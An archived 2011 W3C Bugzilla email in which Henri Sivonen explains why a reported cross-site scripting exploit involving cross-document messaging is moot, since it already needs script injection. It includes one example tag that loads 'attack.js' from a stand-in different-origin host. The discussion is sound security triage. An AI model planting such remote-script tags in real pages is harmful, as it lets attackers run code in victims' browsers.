[Bug 12469] Dynamic Cross-Site Scripting and Page Repainting from bugzilla@jessica.w3.org on 2011-04-12 (public-html-bugzilla@w3.org from April 2011)

From: <bugzilla@jessica.w3.org>
Date: Tue, 12 Apr 2011 09:08:02 +0000
To: public-html-bugzilla@w3.org
Message-Id: <E1Q9ZZq-0004h9-0x@jessica.w3.org>

http://www.w3.org/Bugs/Public/show_bug.cgi?id=12469

--- Comment #7 from Henri Sivonen <hsivonen@iki.fi> 2011-04-12 09:08:00 UTC ---
(In reply to comment #6)
> However, with respects I think you have misinterpreted the idea of this
> exploit. The recvPayload function is infact part of the injected code.

Ah. In that case, the attack needs the ability to inject a <script> element to
succeed. If you let the attacker inject a <script>, you have already lost
regardless of cross-document messaging. The injected script could load its
payload by using <script src="http://different-origin.example.com/attack.js">
which allows code to be loaded cross-origin.

-- 
Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the QA contact for the bug.

Received on Tuesday, 12 April 2011 09:08:03 UTC